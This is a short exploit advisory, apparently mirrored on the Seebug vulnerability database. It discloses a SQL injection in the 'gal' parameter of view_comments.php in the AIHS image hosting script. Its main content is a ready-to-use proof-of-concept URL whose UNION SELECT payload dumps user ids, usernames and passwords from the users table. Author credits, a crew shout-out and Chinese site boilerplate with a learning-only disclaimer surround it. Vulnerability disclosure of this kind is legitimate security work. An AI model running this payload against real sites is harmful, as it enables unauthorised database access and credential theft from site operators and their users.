# Exploit Title: AIHS (Advanced Image Hosting Script) SQL Injection Vulnerability # Author: Robert Cooper ( Robert.Cooper [at] areyousecure.net ) # Software Link: http://yabsoft.com/ # Tested on: [Linux/Windows 7] #Vulnerable File: view_comments.php #Vulnerable parameter: view_comments.php?gal=[gallery id] ############################################################## PoC: www.example.com/view_comments.php?gal=109 union all select 1,2,3,4,5,6,7,group_concat(id,0x3a,user,0x3a,pass,0x0a) FROM users-- ############################################################## www.areyousecure.net www.websiteauditing.org # Shouts to the Belegit crew
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论